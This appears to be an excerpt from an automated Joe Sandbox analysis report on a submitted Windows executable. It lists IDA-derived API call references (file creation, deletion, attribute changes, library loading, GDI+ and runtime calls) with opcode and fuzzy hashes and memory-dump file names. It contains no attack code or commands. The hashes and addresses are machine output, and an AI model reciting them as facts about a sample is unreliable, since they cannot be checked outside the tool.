                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 81c8ecfa4f3f6ba238119a1f86a9aa0832008438ef15197ec438c698cee6965b
                                                                                                                                        • Instruction ID: bb9779935592db148aec83c5988c895f1d3ca7280726dde8a0a5af845091a45e
                                                                                                                                        • Opcode Fuzzy Hash: 81c8ecfa4f3f6ba238119a1f86a9aa0832008438ef15197ec438c698cee6965b
                                                                                                                                        • Instruction Fuzzy Hash: AD4158B0905B40DED720CF7984899E6FBE5FF29300F904A2ED5EE87282CB366564CB11
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 00795FB1: __EH_prolog.LIBCMT ref: 00795FB6
                                                                                                                                          • Part of subcall function 0079C413: __EH_prolog.LIBCMT ref: 0079C418
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C45B
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C47F
                                                                                                                                        • new.LIBCMT ref: 007913FB
                                                                                                                                          • Part of subcall function 0079AC66: __EH_prolog.LIBCMT ref: 0079AC6B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 13868041f83fece33b1cbba4a4b926211032f783b3146aef9957a143b7cd0151
                                                                                                                                        • Instruction ID: abdaf34c710e2c011494efd7b0b35ad8cb3626fe9d53496497ba5472e89605c2
                                                                                                                                        • Opcode Fuzzy Hash: 13868041f83fece33b1cbba4a4b926211032f783b3146aef9957a143b7cd0151
                                                                                                                                        • Instruction Fuzzy Hash: 434149B0805B40DED721DF7984899E6FBE5FF29300F504A2ED5EE83282CB366564CB11
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B631F: GetLastError.KERNEL32(?,007CCBE8,007B2674,007CCBE8,?,?,007B2213,?,?,007CCBE8), ref: 007B6323
                                                                                                                                          • Part of subcall function 007B631F: _free.LIBCMT ref: 007B6356
                                                                                                                                          • Part of subcall function 007B631F: SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B6397
                                                                                                                                          • Part of subcall function 007B631F: _abort.LIBCMT ref: 007B639D
                                                                                                                                          • Part of subcall function 007B8576: _abort.LIBCMT ref: 007B85A8
                                                                                                                                          • Part of subcall function 007B8576: _free.LIBCMT ref: 007B85DC
                                                                                                                                          • Part of subcall function 007B81EB: GetOEMCP.KERNEL32(00000000,?,?,007B8474,?), ref: 007B8216
                                                                                                                                        • _free.LIBCMT ref: 007B84CF
                                                                                                                                        • _free.LIBCMT ref: 007B8505
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2991157371-0
                                                                                                                                        • Opcode ID: caadadf3d94635201a87948b9ea502776b4909eea5cbc72f468ec80ad2eb3226
                                                                                                                                        • Instruction ID: 716afe4f0458389df0f2ccb240d71429ab3f9fe74f6c4e15176755ccd3e7fd69
                                                                                                                                        • Opcode Fuzzy Hash: caadadf3d94635201a87948b9ea502776b4909eea5cbc72f468ec80ad2eb3226
                                                                                                                                        • Instruction Fuzzy Hash: 6F31C231904249EFDB60EF68D545BDD77E9EF40321F254099E4049B291EF399E41CB52
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00799B87,?,?,00797735), ref: 00799579
                                                                                                                                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00799B87,?,?,00797735), ref: 007995AE
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: f5f3520affd21fc833592edb96f7dfb2e4533f7dd616fa59c8f38f6cb6de8998
                                                                                                                                        • Instruction ID: 6a07e38e1694b90c15f452cf90908cff21c05af179b64e4ae2219bc2b3ee9378
                                                                                                                                        • Opcode Fuzzy Hash: f5f3520affd21fc833592edb96f7dfb2e4533f7dd616fa59c8f38f6cb6de8998
                                                                                                                                        • Instruction Fuzzy Hash: 6321E6B1004748EFEB318F18D845BA7B7E8EB49764F01492DF5D5821D1C278AD498AA1
                                                                                                                                        APIs
                                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00797436,?,?,?), ref: 00799A2C
                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00799ADC
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1392018926-0
                                                                                                                                        • Opcode ID: 4608b219448123034d62deb99a9bc58591fdeb61e1ae919d27b97f8386491379
                                                                                                                                        • Instruction ID: bad6a36c07ab09936a213911a44e9fc6dce8dc8385b57e1b20769bc186984c1a
                                                                                                                                        • Opcode Fuzzy Hash: 4608b219448123034d62deb99a9bc58591fdeb61e1ae919d27b97f8386491379
                                                                                                                                        • Instruction Fuzzy Hash: 0A21D331158385AFEB11DE28E885AAABBD8EF96704F08891DF8C1C7181D72DED48C791
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007B7795
                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007B77A2
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2279764990-0
                                                                                                                                        • Opcode ID: d28e8dd8cbc515ef18802e09d1f7beff966bb248b1044d3e6e0ce108bb850d4c
                                                                                                                                        • Instruction ID: 9840826a2e88e499ff72685dbfc688de4bbdb184f6dda336e31edf29fdcf05d4
                                                                                                                                        • Opcode Fuzzy Hash: d28e8dd8cbc515ef18802e09d1f7beff966bb248b1044d3e6e0ce108bb850d4c
                                                                                                                                        • Instruction Fuzzy Hash: 2D115937A042259BDB299E28ECC4EDA33A5ABC4734B168220FC14EB254DF39DC41C7D1
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00799B21
                                                                                                                                        • GetLastError.KERNEL32 ref: 00799B2D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                        • Opcode ID: b16210dccd1e7459122fb099a9a0250fbd6532928ad070699ca749fc22347dce
                                                                                                                                        • Instruction ID: fcbb7dcb0172c700a12db1780f8ee9d8dd89c476c991a591cf72d9571b175527
                                                                                                                                        • Opcode Fuzzy Hash: b16210dccd1e7459122fb099a9a0250fbd6532928ad070699ca749fc22347dce
                                                                                                                                        • Instruction Fuzzy Hash: D00180B0705604ABFF349E69FC48B66B7D9AB84315F14463EB256C3680CA3DDC088611
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 007998EB
                                                                                                                                        • GetLastError.KERNEL32 ref: 007998F8
                                                                                                                                          • Part of subcall function 007996AA: __EH_prolog.LIBCMT ref: 007996AF
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileH_prologLastPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4236474358-0
                                                                                                                                        • Opcode ID: fecb1843d00ce178449a3340f47a1fb989f1658c2f0ec326e8e5594b2ef20044
                                                                                                                                        • Instruction ID: 17278b3a0bb635a4e8c458dac2a6ac7bc13404f8d2462d91a8fac55c4decc10f
                                                                                                                                        • Opcode Fuzzy Hash: fecb1843d00ce178449a3340f47a1fb989f1658c2f0ec326e8e5594b2ef20044
                                                                                                                                        • Instruction Fuzzy Hash: 6B01B532600205EBAF188E5DAC44DAA7769BF82330715822DEA268B291D734EC018760
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007B5B0B
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,007CCBE8,007917A1,?,?,?,?,00000000,?,00791378,?,?), ref: 007B5B47
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2447670028-0
                                                                                                                                        • Opcode ID: 88a39931f4962cd726716c556999cbe499e415d61f08ecc1e590bef142182218
                                                                                                                                        • Instruction ID: ee8c5ea7f4cb534559298b3b7728a97636b102cc657c55a233d5e10a5c428568
                                                                                                                                        • Opcode Fuzzy Hash: 88a39931f4962cd726716c556999cbe499e415d61f08ecc1e590bef142182218
                                                                                                                                        • Instruction Fuzzy Hash: 47F0F672311E05E6DB312B259C05FEB3B5D9F81770F144119F8189A1A2DE3CD80081B0
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(?,?,00000200,?), ref: 0079D187
                                                                                                                                        • LoadStringW.USER32(?,?,00000200,?), ref: 0079D19D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                        • Opcode ID: afa39811f132ab3b1c6874ec2dc26ea83cc3302bf19d7083b6fa79cffc425b3b
                                                                                                                                        • Instruction ID: bf0a3d932373c607f3afeeb9d679b7981382e34dfe98e58f4d30596e00adc421
                                                                                                                                        • Opcode Fuzzy Hash: afa39811f132ab3b1c6874ec2dc26ea83cc3302bf19d7083b6fa79cffc425b3b
                                                                                                                                        • Instruction Fuzzy Hash: 97F0CDB370122C7FEF229F90BC85FA77B5AEB05385F01483DFA8896061D6294C0187A8
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 0079FCB3
                                                                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 0079FCBA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1231390398-0
                                                                                                                                        APIs
                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A0D7
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A108
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText_swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3011073432-0
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00799611,?,?,0079946C), ref: 00799DBD
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00799611,?,?,0079946C), ref: 00799DEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00799E08,?,007975A0,?,?,?,?), ref: 00799E24
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00799E08,?,007975A0,?,?,?,?), ref: 00799E50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1175261203-0
                                                                                                                                        APIs
                                                                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007A8945
                                                                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007A894C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1918208029-0
                                                                                                                                        APIs
                                                                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,007BF79B,000000FF), ref: 007A90C7
                                                                                                                                        • CoUninitialize.COMBASE(?,?,?,007BF79B,000000FF), ref: 007A90CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3856339756-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B1D9A: try_get_function.LIBVCRUNTIME ref: 007B1DAF
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007B0CC4
                                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007B0CCF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 806969131-0
                                                                                                                                        • Opcode ID: bed52420c0bb84e721105f3a08d23567f8e113aa7337b9dca28339aa211fbbea
                                                                                                                                        • Instruction ID: 01c1e5a45ba9d28c4b9c94312ed74c3af804ea1331b571d854d763f5bbfff8f4
                                                                                                                                        • Opcode Fuzzy Hash: bed52420c0bb84e721105f3a08d23567f8e113aa7337b9dca28339aa211fbbea
                                                                                                                                        • Instruction Fuzzy Hash: E6D023B5648309BD1D0037702C367DF1F4454117B57F00745F021951C1DF1C804151B6
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3351165006-0
                                                                                                                                        • Opcode ID: 1190eeef9e7603bf103aa6c673b3b7b604b1fcfaf621a2dbc7f8e875a1c4649e
                                                                                                                                        • Instruction ID: 33197b71b8d20c65f8b77510758a03802dafcd6302b7f4f2be23d045e26ca6b7
                                                                                                                                        • Opcode Fuzzy Hash: 1190eeef9e7603bf103aa6c673b3b7b604b1fcfaf621a2dbc7f8e875a1c4649e
                                                                                                                                        • Instruction Fuzzy Hash: 4FC012B2058204BFCB010FB0DC09C2EFBAAABA5216F00C908B4A5C00A0C23CC820DB12
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(007D1E74,?,?,?,?,0079A5A0,?,?,?,?,007BF79B,000000FF), ref: 0079FC42
                                                                                                                                        • LeaveCriticalSection.KERNEL32(007D1E74,?,?,?,?,0079A5A0,?,?,?,?,007BF79B,000000FF), ref: 0079FC99
                                                                                                                                          • Part of subcall function 0079F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0079FA05
                                                                                                                                          • Part of subcall function 0079F9D1: CloseHandle.KERNEL32(?,?), ref: 0079FA1F
                                                                                                                                          • Part of subcall function 0079F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0079FA38
                                                                                                                                          • Part of subcall function 0079F9D1: CloseHandle.KERNELBASE(?), ref: 0079FA44
                                                                                                                                          • Part of subcall function 0079F9D1: CloseHandle.KERNEL32(?), ref: 0079FA50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3265325312-0
                                                                                                                                        • Opcode ID: a7321896aa8f2523588f4cdefc4ae9ae1d99cad28501aa7365415d714b4a6dce
                                                                                                                                        • Instruction ID: 76fc1b6666a46d60cb19a7af6c8e37b64c3912a82eef1f1abab4994c924c8641
                                                                                                                                        • Opcode Fuzzy Hash: a7321896aa8f2523588f4cdefc4ae9ae1d99cad28501aa7365415d714b4a6dce
                                                                                                                                        • Instruction Fuzzy Hash: 67F0A432205214BB9A116724FC8497AB72CD687765366822BFC04E3242DB2DAC4143B4
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: d7bb474acb9ac30a07b1378dd7a9cc201287e6dfe5a666acd47ca29f1566f4be
                                                                                                                                        • Instruction ID: 3f6332269fda3ed3782c26d87e30ea95b13edeed5c337532eb902d81dd15afd1
                                                                                                                                        • Opcode Fuzzy Hash: d7bb474acb9ac30a07b1378dd7a9cc201287e6dfe5a666acd47ca29f1566f4be
                                                                                                                                        • Instruction Fuzzy Hash: 5BB1D270A04647AEEF19CF78D484BF9FBA6FF05304F94825AE46593281C739A874CB91
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00798210
                                                                                                                                          • Part of subcall function 0079137E: __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 0079137E: new.LIBCMT ref: 007913FB
                                                                                                                                          • Part of subcall function 007919B1: __EH_prolog.LIBCMT ref: 007919B6
                                                                                                                                        Memory Dump Source
